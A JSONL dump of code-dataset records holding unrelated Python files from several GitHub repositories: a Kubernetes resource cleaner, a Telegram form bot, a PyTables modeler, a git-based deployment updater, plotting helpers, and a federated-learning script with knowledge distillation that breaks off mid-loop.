+{"seq_id":"71139767770","text":"import os\nimport logging\nimport threading\nimport time\n\nfrom kubernetes import client\nfrom kubernetes import config\n\nfrom compute_provisioner import allocator\n\nlogger = logging.getLogger('provisioner.kube_cluster')\n\n\nclass KubeCluster:\n def __init__(self, namespace, dry_run, ignore_lifetime, **kwargs):\n self.namespace = namespace\n\n self.dry_run = dry_run\n\n self.ignore_lifetime = ignore_lifetime\n\n self.k8s = allocator.KubernetesAllocator()\n\n def check_resources(self, resources):\n for x in resources:\n expire = resources[x]\n\n logger.info(f'Checking resource group {x}')\n\n label_selector = f'compute.io/resource-group={x!s}'\n\n if expire is None:\n self.k8s.delete_resources(self.namespace, label_selector)\n else:\n expire = float(expire)\n\n if expire < time.time() or self.ignore_lifetime:\n self.k8s.delete_resources(self.namespace, label_selector)\n\n del resources[x]\n\n logger.info('Removing rogue resources')\n\n key_list = ', '.join([x for x in resources])\n\n rogue_selector = f'compute.io/resource-group,compute.io/resource-group notin ({key_list!s})'\n\n self.k8s.delete_resources(self.namespace, rogue_selector)\n\n complete_selector = f'compute.io/resource-group'\n\n pods = self.k8s.list_pods(self.namespace, complete_selector)\n\n logger.info(f'Checking {len(pods.items)} resource groups of end of life phase')\n\n resource_keys = []\n\n for x in pods.items:\n eol_phase = x.status.phase in ('Succeeded', 'Failed', 'Unknown')\n work_done = x.metadata.labels.get('compute.io/state', '') == 'Done'\n\n if eol_phase or work_done:\n resource_keys.append(x.metadata.labels['compute.io/resource-group'])\n\n logger.info(f'Found resource group {resource_keys[-1]} with eol condition')\n\n del resources[resource_keys[-1]]\n\n logger.debug(f'Removed {count} entries in redis')\n\n eol_resource_keys = ', '.join(resource_keys)\n\n eol_selector = f'compute.io/resource-group,compute.io/resource-group in ({eol_resource_keys!s})'\n\n self.k8s.delete_resources(self.namespace, eol_selector)\n","repo_name":"ESGF/esgf-compute-wps","sub_path":"compute/compute_provisioner/compute_provisioner/kube_cluster.py","file_name":"kube_cluster.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"19375831190","text":"from aiogram.types import ReplyKeyboardRemove\r\nfrom aiogram import Dispatcher, Bot, types, executor\r\n\r\nfrom aiogram.dispatcher import FSMContext\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nfrom aiogram.dispatcher.filters.state import StatesGroup, State\r\n\r\nfrom config import TOKEN, main_panel, geneder_panel, admin_id, cancel_btn\r\n\r\n\r\nstorage = MemoryStorage()\r\nbot = Bot(TOKEN)\r\ndp = Dispatcher(bot, storage = storage)\r\n\r\nclass Form(StatesGroup):\r\n name = State()\r\n age = State()\r\n gender = State()\r\n\r\n@dp.message_handler(commands = 'start')\r\nasync def welcome(message: types.Message):\r\n await bot.send_message(message.from_user.id, f'Привет {message.from_user.username}!\\nя бот для заполнения анекты📁', reply_markup = main_panel)\r\n\r\n@dp.message_handler(content_types = 'text')\r\nasync def text_filter(message: types.Message):\r\n if message.text == '📁заполнить форму📁':\r\n await bot.send_message(message.from_user.id, '1️⃣ для начала вам потребуется ввести своё\\nимя и фамилию👥', reply_markup = cancel_btn)\r\n await Form.name.set()\r\n\r\n#* name setting\r\n# if your message is numeric or lenght of your message is under 2 symbols, then bot\r\n# is gonna ask you to reenter your name\r\n@dp.message_handler(state = Form.name)\r\nasync def set_name_func(message: types.Message, state: FSMContext):\r\n await state.update_data(username = message.from_user.username)\r\n await state.update_data(name = message.text)\r\n data = await state.get_data()\r\n\r\n if data['name'].isnumeric() or len(data['name']) < 2:\r\n await bot.send_message(message.from_user.id, 'введите своё имя и фамилию по примеру\\nпример: Алексей Хлюпочкин')\r\n \r\n elif data['name'] == '📛отмена📛':\r\n await state.finish()\r\n await welcome(message)\r\n \r\n else:\r\n await bot.send_message(message.from_user.id, '2️⃣ отлично💫\\nтеперь введите свой возраст')\r\n await Form.next()\r\n\r\n#* age setting\r\n# if you are under 18, then you are declined\r\n# if you sent message with letters, then bot is gonna ask you to reenter your age\r\n@dp.message_handler(state = Form.age)\r\nasync def set_age(message: types.Message, state: FSMContext):\r\n await state.update_data(age = message.text)\r\n data = await state.get_data()\r\n\r\n if int(data['age']) < 18:\r\n await bot.send_message(message.from_user.id, 'мы просим прощения но\\n👶вы ещё молоды для нас👶')\r\n await state.finish()\r\n await welcome(message)\r\n elif data['age'].isnumeric():\r\n await bot.send_message(message.from_user.id, '3️⃣ отлично✅, теперь укажите свой гендер', reply_markup = geneder_panel)\r\n await Form.next()\r\n\r\n elif data['age'] == '📛отмена📛':\r\n await state.finish()\r\n await welcome(message)\r\n\r\n else:\r\n await bot.send_message(message.from_user.id, '❌ введите свой возраст. пример: 25')\r\n\r\n#* gender ssetting\r\n# if you sent \"male\" or \"female\" instead of \"🚹\" or \"🚺\", then\r\n# bot is gonna ask you to choose one of the symbols\r\n@dp.message_handler(state = Form.gender)\r\nasync def set_gender(message: types.Message, state: FSMContext):\r\n await state.update_data(gender = message.text)\r\n data = await state.get_data()\r\n\r\n if data['gender'] == '🚹' or data['gender'] == '🚺':\r\n # when bot is sending the form to the admin, bot is changin symbols to text\r\n if data['gender'] == '🚺':\r\n data['gender'] = 'female'\r\n else:\r\n data['gender'] = 'male'\r\n\r\n print(data)\r\n\r\n await bot.send_message(admin_id, f\"username: @{data['username']}\\nname: {data['name']}\\nage: {data['age']}\\ngender: {data['gender']}\")\r\n await bot.send_message(message.from_user.id, 'Спасибо что заполнили форму, я отправил вашу анкету админу, при надобности с вами свяжутся', reply_markup = ReplyKeyboardRemove())\r\n await state.finish()\r\n \r\n elif data['gender'] == '📛отмена📛':\r\n await state.finish()\r\n await welcome(message)\r\n \r\n else:\r\n await bot.send_message(message.from_user.id, 'выберите вариант ниже\\n(м - 🚹 или ж - 🚺)', reply_markup = geneder_panel)\r\n await Form.gender.set()\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp)\r\n#| coded by c0dem","repo_name":"co-dem/portfolio","sub_path":"Form_bot/v2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71739197210","text":"#\nimport collections\nimport copy\nimport tables\nimport os\nimport ShareYourSystem as SYS\nimport sys\n#\n\n#\nModelingJoinStr='__'\nModelingLinkStr='_'\n#\n\n#\nclass ModelerClass(SYS.StructurerClass):\n\t\n\t#\n\tdef initAfter(self):\n\n\t\t#\n\t\tself.IsModelingBool=True\t\t\t\t\t\t\t#\n\t\tself.ModeledDict={} \t\t\t\t\t\t\t\t#\n\t\tself.ModeledOrderedDict=collections.OrderedDict()\t#\n\t\t#\n\n\tdef model(self,_ModelStr=\"\",**_ModelingVariablesDict):\n\t\t\"\"\"Call the Output methods and return self.OutputedPointer (self by default)\"\"\"\n\n\t\t#debug\n\t\tprint('Modeler model method')\n\t\tprint('_ModelStr is ',_ModelStr)\n\t\tprint('')\n\n\t\t#Reinit attributes\n\t\tLocalOutputedPointer=self\n\t\tif _ModelStr==\"\":\n\t\t\t_ModelStr=self.ModeledDict['ModelStr']\n\t\telse:\n\t\t\tself.ModeledDict=self['App_Model_'+SYS.getDoingStrWithDoStr(_ModelStr)+'Dict']\n\t\t\tif self.ModeledDict!=None:\n\t\t\t\tif 'IsModeledBool' not in self.ModeledDict:\n\n\t\t\t\t\t#set variables\n\t\t\t\t\tIsModeledBool=False\n\t\t\t\t\tModelStr=_ModelStr\n\t\t\t\t\tModelingStr=SYS.getDoingStrWithDoStr(ModelStr)\n\t\t\t\t\tModeledStr=SYS.getDoneStrWithDoStr(ModelStr)\n\t\t\t\t\tModeledSuffixStr=SYS.getClassStrWithTypeStr(ModeledStr+'Model')\n\t\t\t\t\tModeledKeyStr=\"\"\n\n\t\t\t\t\t#Put them in the ModeledDict\n\t\t\t\t\tLocalVars=vars()\n\t\t\t\t\tmap(\n\t\t\t\t\t\t\tlambda __GettingStr:\n\t\t\t\t\t\t\tself.ModeledDict.__setitem__(__GettingStr,LocalVars[__GettingStr]),\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t'IsModeledBool',\n\t\t\t\t\t\t\t\t'ModelStr',\n\t\t\t\t\t\t\t\t'ModelingStr',\n\t\t\t\t\t\t\t\t'ModeledStr',\n\t\t\t\t\t\t\t\t'ModeledSuffixStr',\n\t\t\t\t\t\t\t\t'ModeledKeyStr'\n\t\t\t\t\t\t\t]\n\t\t\t\t\t\t)\n\n\t\t#set IsModelingBool\n\t\tself.IsModelingBool=True\n\t\t\n\t\t#Hook methods\n\t\tfor OrderStr in [\"Before\",\"After\"]:\n\t\t\n\t\t\t#Definition the HookMethodStr\n\t\t\tHookingMethodStr='model'+OrderStr\n\n\t\t\t#Check that there is HookingMethods for it\n\t\t\tif HookingMethodStr in self.__class__.HookingMethodStrToMethodsListDict:\n\n\t\t\t\t#Call the specific Appended methods \n\t\t\t\tfor HookingMethod in self.__class__.HookingMethodStrToMethodsListDict[HookingMethodStr]:\n\n\t\t\t\t\t#Call the HookMethod\n\t\t\t\t\tOutputVariable=HookingMethod(self,**_ModelingVariablesDict)\n\n\t\t\t\t\tif type(OutputVariable)==dict:\n\t\t\t\t\t\tif 'LocalModelingVariablesDict' in OutputVariable:\n\t\t\t\t\t\t\tLocalModelingVariablesDict=OutputVariable['LocalModelingVariablesDict']\n\t\t\t\t\t\tif 'LocalOutputedPointer' in OutputVariable:\n\t\t\t\t\t\t\tLocalOutputedPointer=OutputVariable['LocalOutputedPointer']\n\n\t\t\t\t\t#Check Bool\n\t\t\t\t\tif self.IsModelingBool==False:\n\t\t\t\t\t\treturn LocalOutputedPointer\n\n\t\t#debug\n\t\tprint('END Modeler model method')\n\t\tprint('_ModelStr is ',_ModelStr)\n\t\tprint('')\n\n\t\t#Return the OutputVariable\n\t\treturn LocalOutputedPointer\n\n\tdef modelBefore(self,**_ModelingVariablesDict):\n\n\t\t#debug\n\t\t'''\n\t\tprint('Modeler modelBefore method')\n\t\tprint(\"self.ModeledDict['ModelStr'] is \",self.ModeledDict['ModelStr'])\n\t\tprint('')\n\t\t'''\n\n\t\t#set the global config of this model if it was not already\n\t\tif 'ModelClassesOrderedDict' not in self.ModeledDict:\n\n\t\t\t#debug\n\t\t\tprint('This is the first model of this Model')\n\t\t\tprint('ModelClassesOrderedDict not exists')\n\t\t\tprint('')\n\n\t\t\t'''\n\t\t\t#Get the AlmostShapingColumningTuplesList and NotShapedColumningTuplesList\n\t\t\t[\n\t\t\t\tself.ModeledDict['AlmostShapingColumningTuplesList'],\n\t\t\t\tself.ModeledDict['NotShapedColumningTuplesList']\n\t\t\t]=SYS.groupby(\n\t\t\t\t\t\t\t\tlambda __ModeledTuple:\n\t\t\t\t\t\t\t\ttype(__ModeledTuple[1])==tuple,\n\t\t\t\t\t\t\t\tself.ModeledDict['ColumningTuplesList']\n\t\t\t\t\t\t\t)\n\t\t\t'''\n\n\t\t\t#debug\n\t\t\t'''\n\t\t\tprint(\"self.ModeledDict['AlmostShapingColumningTuplesList'] is \",self.ModeledDict['AlmostShapingColumningTuplesList'])\n\t\t\tprint(\"self.ModeledDict['NotShapedColumningTuplesList'] is \",self.ModeledDict['NotShapedColumningTuplesList'])\n\t\t\tprint('')\n\t\t\t'''\n\n\t\t\t#Init the ModelClassesOrderedDict\n\t\t\tself.ModeledDict['ModelClassesOrderedDict']=collections.OrderedDict()\n\n\t\t#debug\n\t\tprint('We are going to define a ModeledDescriptionClass for this Model ?')\n\t\tprint(\"self.ModeledDict['ModelStr'] is \",self.ModeledDict['ModelStr'])\n\t\tprint(\"self.ModeledDict['IsModeledBool'] is \",self.ModeledDict['IsModeledBool'])\n\t\tprint('')\n\n\t\t#Check\n\t\tif self.ModeledDict['IsModeledBool']==False:\n\n\t\t\t#debug\n\t\t\tprint('Yes we define a new ModeledDescriptionClass...')\n\t\t\tprint('')\n\n\t\t\t#Definition the ModelClass\n\t\t\tclass ModeledDescriptionClass(tables.IsDescription):\n\n\t\t\t\t#Add a tabulared Int (just like a unique KEY in mysql...) \n\t\t\t\tRowInt=tables.Int64Col()\n\n\t\t\t#set the not shaping cols in the ModelClass\n\t\t\tmap(\n\t\t\t\t\tlambda __NotShapingColumningTuple:\n\t\t\t\t\tModeledDescriptionClass.columns.__setitem__(\n\t\t\t\t\t\t__NotShapingColumningTuple[0],\n\t\t\t\t\t\t#copy.copy(__NotShapingColumningTuple[1])\n\t\t\t\t\t\t__NotShapingColumningTuple[1]\n\t\t\t\t\t\t),\n\t\t\t\t\tself.ModeledDict['ColumningTuplesList']\n\t\t\t\t)\n\n\t\t\t#set a name if it was not already\n\t\t\tif self.ModeledDict['ModeledKeyStr']==\"\":\n\t\t\t\tself.ModeledDict['ModeledKeyStr']=self.ModeledDict['ModeledSuffixStr']\n\n\t\t\t#Alias\n\t\t\tModeledKeyStr=self.ModeledDict['ModeledKeyStr']\n\n\t\t\t#Give a name\n\t\t\tModeledDescriptionClass.__name__=ModeledKeyStr\t\t\n\n\t\t\t#set the ModelClass\n\t\t\tself.ModeledDict['ModelClassesOrderedDict'][ModeledKeyStr]=ModeledDescriptionClass\n\n\t\t\t#Put local variables in the ModeledDict\n\t\t\tLocalVars=vars()\n\t\t\tmap(\n\t\t\t\t\tlambda __GettingStr:\n\t\t\t\t\tself.ModeledDict.__setitem__(__GettingStr,LocalVars[__GettingStr]),\n\t\t\t\t\t[\n\t\t\t\t\t\t'ModeledDescriptionClass'\n\t\t\t\t\t]\n\t\t\t\t)\n\n\t#\n\n#\n\n#\ndef attest_model():\n\n\t#Build Hdf groups\n\tModeler=SYS.ModelerClass().update(\n\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t('App_Model_ParameterizingDict',\n\t\t\t\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\t\t\t\t'ColumningTuplesList':\n\t\t\t\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t\t\t\t('MyInt',tables.Int64Col()),\n\t\t\t\t\t\t\t\t\t\t\t\t\t('MyStr',tables.StrCol(10)),\n\t\t\t\t\t\t\t\t\t\t\t\t\t('MyIntsList',tables.Int64Col(shape=3))\n\t\t\t\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t).model('Parameter')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t#Return the object itself\n\treturn 'Attest gives : \\n\\n\\n\\n'+SYS.represent(\n\t\t\t\t\t\t\tModeler\n\t\t\t\t\t\t)+'\\n\\n\\n\\n'+SYS.represent(\n\t\t\t\t\t\t\tModeler.ModeledDescriptionClass.__dict__\n\t\t\t\t\t\t)\n#\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/ShareYourSystem/Standards/Modelers/Modeler/draft/Modeler copy.py","file_name":"Modeler copy.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34610923438","text":"import os\nimport subprocess\nimport json\nimport re\nimport sys\n\nfrom datetime import datetime, timezone\nfrom dateutil import parser\nfrom collections import Counter\n\nsys.path.insert(0, \"/opt/shared/python\")\n\nfrom smartserver.github import GitHub\n\nclass DeploymentUpdate:\n def __init__(self,config):\n self.config = config\n \n self.deployment_state = None\n if os.path.isfile(config.deployment_state_file):\n with open(config.deployment_state_file, 'r') as f:\n try:\n self.deployment_state = json.load(f)\n except JSONDecodeError:\n pass\n \n def process(self, update_time):\n smartserver_code = None\n smartserver_pull = None\n smartserver_changes = None\n \n if self.deployment_state is None:\n smartserver_code = \"missing\"\n else:\n # git add files (intent to add) \n subprocess.run([ \"git\", \"-C\", self.config.git_directory, \"add\", \"-N\", \"*\" ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n result = subprocess.run([ \"git\", \"-C\", self.config.git_directory, \"diff-index\", \"--name-status\", \"origin/master\" ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n uncommitted_changes = result.stdout.decode(\"utf-8\").strip().split(\"\\n\")\n\n deployment_stat = os.stat(self.config.deployment_state_file)\n deployment_mtime = deployment_stat.st_mtime\n\n if len(uncommitted_changes) == 1 and uncommitted_changes[0] == \"\":\n can_pull = False\n if \"github\" in self.config.git_remote:\n result = subprocess.run([ \"git\", \"ls-remote\", self.config.git_remote ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n commits = result.stdout.decode(\"utf-8\").strip().split(\"\\n\")\n last_git_hash = commits[0].split(\"\\t\")[0]\n\n repository_owner = GitHub.getRepositoryOwner(self.config.git_remote)\n\n result = GitHub.getStates(repository_owner,last_git_hash)\n\n states = Counter(result.values())\n \n if \"failed\" in states:\n smartserver_code = \"failed\"\n elif \"pending\" in states or \"success\" not in states:\n smartserver_code = \"pending\"\n else:\n can_pull = True\n smartserver_code = \"pulled_tested\"\n else:\n can_pull = True\n smartserver_code = \"pulled_untested\"\n \n if can_pull:\n result = subprocess.run([ \"git\", \"pull\" ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n smartserver_pull = update_time;\n else:\n smartserver_code = \"uncommitted\"\n \n last_deployment = datetime.fromtimestamp(deployment_mtime, tz=timezone.utc)\n #last_deployment = \"2020-01-20 14:02:00.651984+00:00\"\n #print( \" \".join([ \"git\", \"-C\", self.config.git_directory, \"rev-list\", \"-1\", \"--before\", str(last_deployment), \"origin/master\" ]))\n result = subprocess.run([ \"git\", \"-C\", self.config.git_directory, \"rev-list\", \"-1\", \"--before\", str(last_deployment), \"origin/master\" ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n ref = result.stdout.decode(\"utf-8\").strip()\n \n #print( \" \".join([ \"git\", \"-C\", self.config.git_directory, \"diff-index\", \"--name-status\", ref ]))\n result = subprocess.run([ \"git\", \"-C\", self.config.git_directory, \"diff-index\", \"--name-status\", ref ], check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=None )\n committed_changes = result.stdout.decode(\"utf-8\").strip().split(\"\\n\")\n\n lines = uncommitted_changes + committed_changes\n lines = [ele.split(\"\\t\") for ele in lines]\n \n filtered_lines = {}\n for line in lines:\n if len(line) == 1:\n continue\n \n flag, path = line\n \n if flag != \"D\":\n file_stat = os.stat(\"{}/{}\".format(self.config.git_directory,path))\n file_mtime = file_stat.st_mtime\n \n if file_mtime > deployment_mtime:\n if path not in filtered_lines or flag == \"A\":\n filtered_lines[path] = {\"flag\": flag, \"path\": path}\n \n filtered_values = filtered_lines.values()\n lines = list(filtered_values)\n \n smartserver_changes = lines\n \n return smartserver_code, smartserver_pull, smartserver_changes\n\n","repo_name":"hooperbloob/smartserver","sub_path":"roles/update_daemon/templates/opt/update_daemon/plugins/deploymentUpdate.py","file_name":"deploymentUpdate.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"32794099943","text":"from matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom matplotlib.axes._axes import _make_inset_locator\nfrom matplotlib.projections import PolarAxes\n\nDEFAULT_FIGSIZE = 3.44556 * 2\nGOLDEN_RATIO = 1.61803\n\n\ndef set_default_params(fontsize=10, labelsize=10, titlesize=12, ticksize=10):\n \"\"\" Set the parameters of the plots so that they look nice in my thesis.\n 3.44556 inches is the width of one column (in 2-column layout) in my Latex document.\n\n Returns:\n None\n \"\"\"\n params = {'text.usetex': True,\n 'font.size': fontsize,\n 'font.family': 'serif',\n 'axes.spines.top': False,\n 'axes.spines.right': False,\n 'axes.labelsize': labelsize,\n 'axes.titlesize': titlesize,\n 'xtick.labelsize': ticksize,\n 'ytick.labelsize': ticksize,\n 'figure.figsize': (3.44556, 3.44556 / 1.61803),\n }\n plt.rcParams.update(params)\n\n\ndef get_figsize(width=1/2, ratio=GOLDEN_RATIO, base_figsize=DEFAULT_FIGSIZE):\n \"\"\" Get the figure size for a Latex document in inches\n\n Args:\n width (float): width in terms of textwidth in a Latex doc that the figure should occupy\n base_figsize (float): width of the page\n ratio (float): height = width / ratio\n\n Returns:\n (width, height) tuple of floats\n \"\"\"\n return base_figsize * width, base_figsize * width / ratio\n\n\ndef inset_axes(self, bounds, *, polar=True, transform=None, zorder=5,\n **kwargs):\n \"\"\" Serves as a stand-in for Axes.inset_axes, but also allows polar projection\n\n Args:\n self (Axes): Axes object\n bounds (list): (x, y, xsize, ysize)\n polar (bool): polar projection\n transform (Transfomr): Defaults to `ax.transAxes`, i.e. the units of *rect* are in\n axes-relative coordinates.\n zorder (int): Defaults to 5 (same as `.Axes.legend`). Adjust higher or lower\n to change whether it is above or below data plotted on the\n parent axes.\n **kwargs: Other *kwargs* are passed on to the `axes.Axes` child axes.\n\n Returns:\n Axes - The created `.axes.Axes` instance.\n \"\"\"\n if transform is None:\n transform = self.transAxes\n label = kwargs.pop('label', 'inset_axes')\n\n # This puts the rectangle into figure-relative coordinates.\n inset_locator = _make_inset_locator(bounds, transform, self)\n bb = inset_locator(None, None)\n\n if polar:\n inset_ax = PolarAxes(self.figure, bb.bounds, zorder=zorder,\n label=label, **kwargs)\n else:\n inset_ax = Axes(self.figure, bb.bounds, zorder=zorder,\n label=label, **kwargs)\n\n # this locator lets the axes move if in data coordinates.\n # it gets called in `ax.apply_aspect() (of all places)\n inset_ax.set_axes_locator(inset_locator)\n\n self.add_child_axes(inset_ax)\n\n return inset_ax\n","repo_name":"RothkopfLab/imgstats-frontiersin","sub_path":"imgstats/plot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"23792727978","text":"\nimport numpy as np\nimport seaborn as sns\n\nsns.set_theme()\n\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.datasets import make_blobs\n\nnclass = 3\ncurrent_palette = sns.color_palette(\"muted\", n_colors=nclass)\ncmap = ListedColormap(sns.color_palette(current_palette).as_hex())\n\ncenters = [[0, 0], [-3, 3], [-3, -3], [3, 2], [3, -2]]\nclasses_map = {0: 0, 1: 1, 2: 1, 3: 2, 4: 2}\nX, y = make_blobs(n_samples=[1000, 500, 500, 500, 500], centers=centers, cluster_std=0.8,\n n_features=10, random_state=7)\n\ntransformation1 = [[0.5, 0], [0, 1]]\ntransformation2 = [[0.75, 0], [0, 0.75]]\nfor i in range(len(X)):\n label = y[i]\n if label == 0 or label == 1:\n X[i] = np.dot(X[i], transformation1)\n else:\n X[i] = np.dot(X[i], transformation2)\n\n# Divide user data\nsub_class_num = 5\nXs = [0 for _ in range(sub_class_num)]\nfor i in range(sub_class_num):\n Xs[i] = X[y == i]\n\nnuser = 3\nuserX = [0 for _ in range(nuser)]\nuserY = [0 for _ in range(nuser)]\n\ndivides = [[0, 0.3, 0.7, 1], [0, 0.2 ,0.6,1], [0, 0.2, 0, 1], [0 ,0.95 ,0.95,1],[0,0,0.8,0]]\n\nfor i in range(nuser):\n tempX, tempY = [], []\n for j in range(sub_class_num):\n l = len(Xs[j])\n start, end = int(l * divides[j][i]), int(l * divides[j][i + 1])\n tempX.append(Xs[j][start:end])\n if j == 0:\n tempY.append(np.array([j for _ in range(end - start)]))\n else:\n tempY.append(np.array([classes_map[j] for _ in range(end - start)]))\n userX[i] = np.concatenate(tempX, axis=0)\n userY[i] = np.concatenate(tempY, axis=0)\n\nfor i in range(len(y)):\n label = y[i]\n y[i] = classes_map[y[i]]\nfor i in range(nuser):\n print(len(userY[i]))\n\n\ndef plot_scatter(X, y, title, path):\n plt.figure(figsize=(6, 6))\n plt.xticks([-4.0, -2.0, 0.0, 2.0, 4.0])\n plt.xlim([-4.0, 4.0])\n plt.ylim([-4.0, 4.0])\n plt.title(title, size=18)\n plt.scatter(X[:, 0], X[:, 1], s=15, c=y, cmap=cmap, alpha=0.5)\n plt.savefig(path)\n\n\n#plot_scatter(X, y, 'Total data', 'total_data.png')\n\n# for i in range(nuser):\n# plot_scatter(userX[i], userY[i], f\"User {i + 1} data\", f\"./data/plot/user_data_{i + 1}.pdf\")\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ntorch.manual_seed(42)\n\nce_loss = nn.CrossEntropyLoss(reduction=\"mean\")\n\n\ndef kl_loss(student_logits, teacher_logits):\n divergence = F.kl_div(\n F.log_softmax(student_logits, dim=1),\n F.softmax(teacher_logits, dim=1),\n reduction=\"batchmean\",\n )\n return divergence\n\n\nclass MLP(nn.Module):\n def __init__(self, hidden_layer_sizes=None):\n super(MLP, self).__init__()\n if hidden_layer_sizes is None:\n hidden_layer_sizes = [8, 8, 8]\n self.fc = nn.Sequential(\n nn.Linear(2, hidden_layer_sizes[0]),\n nn.ReLU(),\n nn.Linear(hidden_layer_sizes[0], hidden_layer_sizes[1]),\n nn.ReLU(),\n nn.Linear(hidden_layer_sizes[1], hidden_layer_sizes[2]),\n nn.ReLU(),\n nn.Linear(hidden_layer_sizes[2], 3)\n )\n\n def forward(self, x):\n return self.fc(x)\n\n\nclass MLPClassifier():\n def __init__(self, hidden_layer_sizes=[8, 8, 8], max_iter=100):\n self.mlp = MLP(hidden_layer_sizes)\n self.mlp = self.mlp.cuda()\n self.max_iter = max_iter\n\n def fit(self, X, y, kl=False, teachers=None, pos=0):\n\n self.optimizer = torch.optim.Adam(self.mlp.parameters(), lr=0.001)\n for _ in range(self.max_iter):\n output = self.mlp(X)\n loss = ce_loss(output, y)\n if kl == True:\n loss2 = 0\n for i,teacher in enumerate(teachers):\n if teacher == 0:\n continue\n teacher_output = teacher(X)\n loss2 += 10 * kl_loss(output, teacher_output.detach())\n loss = loss + loss2\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n def predict(self, X):\n with torch.no_grad():\n output = self.mlp(X)\n y = torch.argmax(output, dim=1)\n return y\n\n def predict_proba(self, X):\n with torch.no_grad():\n output = self.mlp(X)\n y = torch.softmax(output, dim=1)\n return y\n\n\ndef plot_decision_boundary(model, X, Y, nclass, title, path,\n xrg=None, yrg=None, Nx=300, Ny=300,\n figsize=[6, 6], alpha=0.7):\n try:\n getattr(model, 'predict')\n except:\n print(\"model do not have method predict 'predict' \")\n return None\n\n x1 = X[:, 0].min() - 0.1 * (X[:, 0].max() - X[:, 0].min())\n x2 = X[:, 0].max() + 0.1 * (X[:, 0].max() - X[:, 0].min())\n y1 = X[:, 1].min() - 0.1 * (X[:, 1].max() - X[:, 1].min())\n y2 = X[:, 1].max() + 0.1 * (X[:, 1].max() - X[:, 1].min())\n\n if xrg is None:\n xrg = [x1, x2]\n if yrg is None:\n yrg = [y1, y2]\n\n # generate grid and mesh\n xgrid = np.arange(xrg[0], xrg[1], 1. * (xrg[1] - xrg[0]) / Nx)\n ygrid = np.arange(yrg[0], yrg[1], 1. * (yrg[1] - yrg[0]) / Ny)\n xx, yy = np.meshgrid(xgrid, ygrid)\n\n # generate X for model prediction and predict the Yp\n\n X_full_grid = np.array(list(zip(np.ravel(xx), np.ravel(yy))))\n X_full_grid = torch.tensor(X_full_grid, dtype=torch.float32).cuda()\n #Yp = model.predict(X_full_grid)\n Ypp = model.predict_proba(X_full_grid)\n Ypp = Ypp.cpu()\n print(Ypp)\n\n # initialize figure & axes object\n plt.figure(figsize=figsize)\n\n # plot probability surface\n current_palette = sns.color_palette(\"muted\", n_colors=nclass)\n zz = np.dot(Ypp, sns.color_palette(current_palette))\n zz_r = zz.reshape(xx.shape[0], xx.shape[1], 3)\n plt.imshow(zz_r, origin='lower', interpolation=None,\n extent=[xrg[0], xrg[1], yrg[0], yrg[1]],\n alpha=alpha)\n plt.scatter(X[:, 0], X[:, 1], s=15, c=Y, cmap=cmap, alpha=0.5)\n plt.xlim(xrg)\n plt.ylim(yrg)\n plt.xticks(np.arange(xrg[0], xrg[1] + 1, 2), size=20)\n plt.yticks(np.arange(yrg[0], yrg[1] + 1, 1), size=20)\n plt.title(title, size=20)\n\n plt.savefig(path)\n\ndef model_avg(avg_model, clients_models):\n for param in avg_model.mlp.parameters():\n param.data = torch.zeros_like(param.data)\n for i in range(len(clients_models)):\n for server_param, user_param in zip(avg_model.mlp.parameters(), clients_models[i].mlp.parameters()):\n server_param.data = server_param.data + user_param.data.clone() / nuser\n\n\n return avg_model\n\n\nnuser = 3\ntorch.manual_seed(42)\nimport copy\nimport random\nfor i in range(nuser):\n userX[i], userY[i] = torch.tensor(userX[i],dtype=torch.float32), torch.tensor(userY[i],dtype=torch.int64)\n userX[i], userY[i] = userX[i].cuda(), userY[i].cuda()\n\navg_model = MLPClassifier([128, 128, 128],max_iter=10)\ng_avg_model = copy.deepcopy(avg_model)\nuniform_users = [[0,1,2],[0,1,2]]\nepoch = 0\nbuffer = [0 for _ in range(len(uniform_users))]\n\nwhile epoch < 50:\n #users = total_users\n\n sample_users = uniform_users\n\n for pos,users in enumerate(uniform_users):\n clfs, clfs_KD = [], []\n for i in users:\n clf = copy.deepcopy(avg_model)\n clf.mlp = clf.mlp.cuda()\n clf.fit(userX[i], userY[i])\n if (epoch + 1) % 50 == 0:\n plot_decision_boundary(clf, X=userX[i].cpu(), Y=userY[i].cpu(), nclass=3, title=f'User {i+1} without distillation', path=f\"./data/plot/user_noKD_bound_{i+1}.pdf\", xrg=[-4.0, 4.0], yrg=[-4.0, 4.0])\n clfs.append(clf)\n plt.show()\n\n if epoch > 0:\n for i in users:\n clf = copy.deepcopy(g_avg_model)\n clf.mlp = clf.mlp.cuda()\n # 